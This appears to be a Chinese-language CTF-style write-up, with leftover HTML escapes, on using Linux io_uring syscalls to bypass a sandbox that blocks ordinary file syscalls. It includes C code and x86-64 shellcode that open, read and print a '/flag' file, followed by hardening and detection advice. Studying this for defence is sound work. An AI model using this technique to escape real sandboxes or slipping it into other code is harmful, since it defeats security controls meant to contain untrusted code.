利用 io_uring 实现高效的 Shellcode 攻击技术详解<\/h1>

1. io_uring 技术基础<\/h2>

1.1 io_uring 概述<\/h3>
io_uring 是 Linux 内核于 2019 年引入的一种新型异步 I\/O 模型，旨在通过减少系统调用和上下文切换的开销来显著提高 I\/O 操作性能。其核心特点包括：<\/p>
使用环形缓冲区实现高效的事件驱动机制<\/li>
支持批量提交和完成 I\/O 操作<\/li>
减少用户态与内核态之间的数据拷贝<\/li>
提供高性能的异步 I\/O 操作接口<\/li> <\/ul>
1.2 io_uring 核心系统调用<\/h3>
io_uring 主要依赖两个关键系统调用：<\/p>
io_uring_setup<\/strong> (系统调用号 425)<\/p>
int<\/span> io_uring_setup<\/span>(unsigned<\/span> entries, struct<\/span> io_uring_params *<\/span>params);
<\/span><\/span><\/code><\/pre>
entries<\/code>: 指定环形缓冲区大小（必须是2的幂，范围1-4096）<\/li>
params<\/code>: 用于传递参数和获取返回信息<\/li>
<\/ul>
<\/li>

io_uring_enter<\/strong> (系统调用号 426)<\/p>
int<\/span> io_uring_enter<\/span>(unsigned<\/span> int<\/span> fd, unsigned<\/span> int<\/span> to_submit, 
<\/span><\/span>                  unsigned<\/span> int<\/span> min_complete, unsigned<\/span> int<\/span> flags, 
<\/span><\/span>                  sigset_t sig);
<\/span><\/span><\/code><\/pre>
fd<\/code>: io_uring_setup 返回的文件描述符<\/li>
to_submit<\/code>: 要提交的SQE数量<\/li>
min_complete<\/code>: 要求内核等待完成的请求数量<\/li>
flags<\/code>: 控制调用行为的标志位<\/li>
<\/ul>
<\/li>
<\/ol>
1.3 io_uring 内存映射区域<\/h3>
io_uring 使用三个关键的内存映射区域：<\/p>
#define IORING_OFF_SQ_RING  0ULL          <\/span>\/\/ 提交队列环(SQ Ring)
<\/span><\/span><\/span><\/span>#define IORING_OFF_CQ_RING  0x8000000ULL  <\/span>\/\/ 完成队列环(CQ Ring)
<\/span><\/span><\/span><\/span>#define IORING_OFF_SQES     0x10000000ULL <\/span>\/\/ 提交队列条目数组(SQEs)
<\/span><\/span><\/span><\/code><\/pre>2. 绕过沙箱限制的技术分析<\/h2>
2.1 沙箱限制分析<\/h3>
示例中的沙箱规则禁止了几乎所有常见的文件操作系统调用：<\/p>

基本文件操作：read, write, open<\/li>
扩展文件操作：pread64, pwrite64, readv, writev<\/li>
网络相关：sendfile, sendto, sendmsg<\/li>
执行相关：execve, execveat<\/li>
其他高级操作：openat, preadv, pwritev等<\/li>
<\/ul>
2.2 io_uring 绕过原理<\/h3>
由于沙箱未禁止 io_uring 相关系统调用(425和426)，可以利用它们实现：<\/p>

通过 io_uring_setup 初始化异步I\/O环境<\/li>
使用 io_uring_enter 提交特殊构造的I\/O请求<\/li>
利用 IORING_OP_OPENAT, IORING_OP_READ, IORING_OP_WRITE 等操作码实现文件操作<\/li>
<\/ol>
3. 攻击实现步骤详解<\/h2>
3.1 初始化 io_uring 环境<\/h3>
struct<\/span> io_uring_params params =<\/span> {};
<\/span><\/span>int<\/span> uring_fd =<\/span> syscall(SYS_io_uring_setup, 16<\/span>, &<\/span>params);
<\/span><\/span>
<\/span><\/span>\/\/ 映射三个关键内存区域
<\/span><\/span><\/span><\/span>unsigned<\/span> char<\/span> *<\/span>sq_ring =<\/span> mmap(NULL, 0x1000<\/span>, PROT_READ|<\/span>PROT_WRITE, 
<\/span><\/span>                            MAP_SHARED, uring_fd, IORING_OFF_SQ_RING);
<\/span><\/span>unsigned<\/span> char<\/span> *<\/span>cq_ring =<\/span> mmap(NULL, 0x1000<\/span>, PROT_READ|<\/span>PROT_WRITE,
<\/span><\/span>                            MAP_SHARED, uring_fd, IORING_OFF_CQ_RING);
<\/span><\/span>struct<\/span> io_uring_sqe *<\/span>sqes =<\/span> mmap(NULL, 0x1000<\/span>, PROT_READ|<\/span>PROT_WRITE,
<\/span><\/span>                               MAP_SHARED, uring_fd, IORING_OFF_SQES);
<\/span><\/span><\/code><\/pre>3.2 构造并提交 OPENAT 请求<\/h3>
sqes[0<\/span>] =<\/span> (struct<\/span> io_uring_sqe){
<\/span><\/span>    .opcode =<\/span> IORING_OP_OPENAT,
<\/span><\/span>    .flags =<\/span> IOSQE_ASYNC,
<\/span><\/span>    .addr =<\/span> "\/flag"<\/span>,
<\/span><\/span>    .open_flags =<\/span> O_RDONLY,
<\/span><\/span>};
<\/span><\/span>
<\/span><\/span>\/\/ 更新SQ环指针
<\/span><\/span><\/span><\/span>((int<\/span> *<\/span>)(sq_ring +<\/span> params.sq_off.array))[0<\/span>] =<\/span> 0<\/span>;
<\/span><\/span>(*<\/span>(int<\/span> *<\/span>)(sq_ring +<\/span> params.sq_off.tail))++<\/span>;
<\/span><\/span>
<\/span><\/span>\/\/ 提交请求
<\/span><\/span><\/span><\/span>syscall(SYS_io_uring_enter, uring_fd, 1<\/span>, 1<\/span>, 
<\/span><\/span>        IORING_ENTER_GETEVENTS, NULL, 0<\/span>);
<\/span><\/span>
<\/span><\/span>\/\/ 获取结果
<\/span><\/span><\/span><\/span>struct<\/span> io_uring_cqe *<\/span>cqe =<\/span> (void<\/span> *<\/span>)(cq_ring +<\/span> params.cq_off.cqes);
<\/span><\/span>int<\/span> opened_fd =<\/span> (int<\/span>)cqe-><\/span>res;
<\/span><\/span><\/code><\/pre>3.3 构造并提交 READ 请求<\/h3>
sqes[0<\/span>] =<\/span> (struct<\/span> io_uring_sqe){
<\/span><\/span>    .opcode =<\/span> IORING_OP_READ,
<\/span><\/span>    .fd =<\/span> opened_fd,
<\/span><\/span>    .addr =<\/span> buffer,
<\/span><\/span>    .len =<\/span> 100<\/span>,
<\/span><\/span>};
<\/span><\/span>
<\/span><\/span>\/\/ 更新并提交
<\/span><\/span><\/span><\/span>((int<\/span> *<\/span>)(sq_ring +<\/span> params.sq_off.array))[0<\/span>] =<\/span> 0<\/span>;
<\/span><\/span>(*<\/span>(int<\/span> *<\/span>)(sq_ring +<\/span> params.sq_off.tail))++<\/span>;
<\/span><\/span>syscall(SYS_io_uring_enter, uring_fd, 1<\/span>, 1<\/span>, 
<\/span><\/span>        IORING_ENTER_GETEVENTS, NULL, 0<\/span>);
<\/span><\/span><\/code><\/pre>3.4 构造并提交 WRITE 请求<\/h3>
sqes[0<\/span>] =<\/span> (struct<\/span> io_uring_sqe){
<\/span><\/span>    .opcode =<\/span> IORING_OP_WRITE,
<\/span><\/span>    .fd =<\/span> 1<\/span>,  \/\/ stdout
<\/span><\/span><\/span><\/span>    .addr =<\/span> buffer,
<\/span><\/span>    .len =<\/span> 100<\/span>,
<\/span><\/span>};
<\/span><\/span>
<\/span><\/span>\/\/ 更新并提交
<\/span><\/span><\/span><\/span>((int<\/span> *<\/span>)(sq_ring +<\/span> params.sq_off.array))[0<\/span>] =<\/span> 0<\/span>;
<\/span><\/span>(*<\/span>(int<\/span> *<\/span>)(sq_ring +<\/span> params.sq_off.tail))++<\/span>;
<\/span><\/span>syscall(SYS_io_uring_enter, uring_fd, 1<\/span>, 3<\/span>, 
<\/span><\/span>        IORING_ENTER_GETEVENTS, NULL, 0<\/span>);
<\/span><\/span><\/code><\/pre>4. Shellcode 实现技巧<\/h2>
4.1 寄存器利用<\/h3>
mov<\/span> rbp<\/span>, rdx<\/span>
<\/span><\/span>add<\/span> rbp<\/span>, 0xa00<\/span>  ; 设置基址指针
<\/span><\/span><\/span><\/span>mov<\/span> rbx<\/span>, rbp<\/span>
<\/span><\/span>sub<\/span> rbx<\/span>, 0xf0<\/span>   ; 预留空间
<\/span><\/span><\/span><\/code><\/pre>4.2 系统调用封装<\/h3>
; io_uring_setup
<\/span><\/span><\/span><\/span>mov<\/span> r12<\/span>, [rbp-0x118<\/span>]
<\/span><\/span>xor<\/span> rax<\/span>, rax<\/span>
<\/span><\/span>sub<\/span> rsp<\/span>, 8<\/span>
<\/span><\/span>push<\/span> 0<\/span>
<\/span><\/span>mov<\/span> rax<\/span>, 425<\/span>    ; SYS_io_uring_setup
<\/span><\/span><\/span><\/span>mov<\/span> rdi<\/span>, 16<\/span>     ; entries
<\/span><\/span><\/span><\/span>mov<\/span> rsi<\/span>, rbx<\/span>    ; params
<\/span><\/span><\/span><\/span>syscall<\/span>
<\/span><\/span>add<\/span> rsp<\/span>, 0x10<\/span>
<\/span><\/span><\/code><\/pre>4.3 内存操作<\/h3>
; 映射SQ环
<\/span><\/span><\/span><\/span>mov<\/span> r13<\/span>, rax<\/span>    ; 保存uring_fd
<\/span><\/span><\/span><\/span>mov<\/span> rdi<\/span>, 0<\/span>      ; addr
<\/span><\/span><\/span><\/span>mov<\/span> rsi<\/span>, 1000<\/span>   ; length
<\/span><\/span><\/span><\/span>mov<\/span> rdx<\/span>, 3<\/span>      ; PROT_READ|PROT_WRITE
<\/span><\/span><\/span><\/span>mov<\/span> r10<\/span>, 1<\/span>      ; MAP_SHARED
<\/span><\/span><\/span><\/span>mov<\/span> r8<\/span>, r13<\/span>     ; fd
<\/span><\/span><\/span><\/span>mov<\/span> r9<\/span>, 0<\/span>       ; offset (IORING_OFF_SQ_RING)
<\/span><\/span><\/span><\/span>mov<\/span> rax<\/span>, 9<\/span>      ; SYS_mmap
<\/span><\/span><\/span><\/span>syscall<\/span>
<\/span><\/span>mov<\/span> [rbp-0x110<\/span>], rax<\/span>  ; 保存sq_ring指针
<\/span><\/span><\/span><\/code><\/pre>5. 防御与检测建议<\/h2>


沙箱加固<\/strong>：<\/p>

禁止io_uring相关系统调用(425, 426)<\/li>
限制mmap和mprotect的使用<\/li>
<\/ul>
<\/li>

行为监控<\/strong>：<\/p>

监控非常规文件操作路径<\/li>
检测异常的io_uring使用模式<\/li>
<\/ul>
<\/li>

内核加固<\/strong>：<\/p>

启用io_uring的权限检查<\/li>
限制非特权用户的io_uring访问<\/li>
<\/ul>
<\/li>

代码审计<\/strong>：<\/p>

检查shellcode中的系统调用模式<\/li>
分析异常的异步I\/O操作序列<\/li>
<\/ul>
<\/li>
<\/ol>
6. 总结<\/h2>
io_uring作为高性能I\/O接口，其强大的功能也可能被恶意利用绕过安全限制。本文详细分析了如何利用io_uring实现沙箱逃逸和文件操作的技术细节，包括：<\/p>

io_uring的基本原理和系统调用<\/li>
绕过沙箱限制的具体方法<\/li>
完整的攻击实现流程<\/li>
Shellcode编写技巧<\/li>
防御建议<\/li>
<\/ol>
安全研究人员和系统管理员应充分了解这些技术，以便更好地防御此类高级攻击。<\/p>